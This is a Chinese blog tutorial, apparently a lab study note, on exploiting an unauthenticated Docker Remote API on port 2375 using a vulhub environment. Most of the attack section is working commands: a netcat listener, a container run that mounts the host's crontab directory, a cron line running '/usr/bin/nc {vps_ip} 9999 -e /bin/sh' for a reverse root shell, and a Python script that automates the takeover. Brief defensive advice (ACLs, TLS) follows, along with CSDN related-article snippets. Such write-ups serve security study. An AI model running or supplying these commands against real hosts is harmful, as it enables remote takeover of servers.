未授权访问:Docker未授权访问漏洞

已于 2024-05-14 12:12:56 修改
阅读量1.5k 收藏 34
点赞数 43
分类专栏: 未授权访问 安全 文章标签: docker 容器 运维 web安全 安全 未授权访问 网络安全
于 2024-05-14 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/138450518
版权

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、通过crontab反弹宿主机shell

防御手段

今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第六篇是关于Docker的未授权访问

1、漏洞原理

Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。

开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker。

Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。

存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API,通过这个接口,我们可以新建 container,删除已有 container,甚至是获取宿主机的 shell。

2、环境搭建

# 下载环境
mkdir docker
cd docker 
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh
​
#或者利用DownGit下载https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce
DownGit网址:https://minhaskamal.github.io/DownGit/#/home

 下载漏洞环境:

chmod 777 docker-entrypoint.sh # 给docker-entrypoint.sh权限
docker-compose build && docker-compose up -d # 编译并启动环境

 注:我的拉取环境好慢哟

但是最终还是拉取成功了

3、未授权访问

docker -H tcp://192.168.15.5:2375 version

可以看到成功的未授权访问到了版本信息

4、通过crontab反弹宿主机shell

下列操作均在攻击机上进行的操作:

vps监听9999端口

nc -lvnp 9999

启动容器 

docker -H tcp://192.168.15.5:2375 run -id -v /etc/crontabs:/tmp alpine:latest
docker -H tcp://192.168.15.5:2375 ps

 进入容器

docker -H tcp://192.168.15.5:2375 exec -it a8ff7ed880fb sh

添加任务计划

echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务
​
cat /tmp/root # 查看/tmp/root 文件
​
exit #退出容器

反弹宿主机shell

 

可以看到攻击机(192.168,159.200)成功的反弹了ubuntu主机(192.168.159.202)的shell

也可以直接利用python脚本

import docker
​
client = docker.DockerClient(base_url='http://{target_ip}:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

防御手段

  • -简单粗暴的方法,对2375端口做网络访问控制,如ACL控制,或者访问规则。
  • -修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure Docker Swarm for TLS这两篇文档,说的是配置好TLS后,Docker CLI 在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。

到此,docker未授权访问最基础的知识也就学习完了,后面还有很多的未授权的知识等着我去学习,下次见(*^▽^*)

未知百分百
关注
  • 43
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
authz:Docker授权插件
04-23
插件在基本授权流程中的行为由策略对象确定: // BasicPolicy represent a single policy object that is evaluated in the authorization flow.// Each policy object consists of multiple users and Docker ...
Docker授权访问漏洞
Kevin's Blog
08-03 7674
文章目录一、漏洞介绍1.1 漏洞成因1.2 漏洞概况二、攻击过程2.1 信息收集2.2 漏洞探测2.3 漏洞利用三、防御方法 一、漏洞介绍 1.1 漏洞成因   又叫Docker Remote API授权访问漏洞,此API主要目的是取代命令行界面;Dcoker swarm是docker下的分布化应用的本地集群,开放2375监听容器时,会调用这个API,方便的docker集群管理和扩展(绑定在0.0.0.0上,http会返回404page not fount) 1.2 漏洞概况 fofa搜索全国端口占有概况
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 1729
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
常见授权访问漏洞详解
m0_55854679的博客
05-15 3012
参考文章1:二十八种授权访问漏洞合集 参考文章2:28种授权访问漏洞 简介 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 常见的授权访问漏洞 MongoDB 授权访问漏洞 漏洞信息 开启MongoDB服务时不添加任何参数,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作【增、删、改、查高危动作】而且可以远程访问数据库。 造成授权访问的根本原因就在于启动 Mongodb
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7637
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
19 - vulhub - docker daemon api 授权访问漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1526
Docker是一款国内外云平台常用的应用程序轻量级容器,AWS,百度等都有使用。通常用于轻量化部署应用。 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1372
docker api授权导致rce 漏洞修复
漏洞复现 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 4795
Docker授权访问漏洞docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
Docker API授权漏洞复现
crowsec
01-27 3959
如果在docker上配置了远程访问docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker授权来控制服务器 扫取二维码获取更多信息! 微信公众号:乌鸦安全 扫取二维码获取更多信息!
Docker 授权访问漏洞
Thunderclap的博客
07-13 1933
Docker 授权访问漏洞
Docker授权访问漏洞利用
tangshuangsss的专栏
01-08 1987
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到...
docker-missing-tools:Docker缺少工具
02-06
Docker缺少工具 一组使docker dev-ops更容易的命令。 Docker Missing Tools可帮助自动执行dev-op任务,而不会影响源代码。 避免在共享代码存储库中创建典型的帮助程序脚本,例如“ build.sh”和“ deploy.sh”。 ...
Docker问题——安装过程中问题Errors were encountered while processing: docker-ce
01-07
docker-ce安装时出现错误: dpkg: error processing package docker-ce (--configure): subprocess installed post-installation script returned error exit status 1 Processing triggers for libc-bin (2.23-0...
介绍 Docker 的基本概念和优势,以及在应用程序开发中的实际应用。
最新发布
xy520521的博客
05-20 456
Docker是一个开源的容器化平台,它可以让开发者打包应用程序及其依赖项为一个容器,然后将其部署在任何支持Docker的环境中。
使用DockerFile 编写 指令来构建镜像
杨杨杨~~的博客
05-20 648
如果您觉得有用的话,记得给,写作不易啊^ _ ^。而且听说,实在白嫖的话,那欢迎常来啊!!!
下一代Docker会让部署更丝滑吗
csdn565973850的博客
05-20 1106
简述什么是Docker,优缺点以及一些遐想
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 Docker Registry 的权限、加强密码强度,并且定期更新 Docker Registry 的软件等方式来保障安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值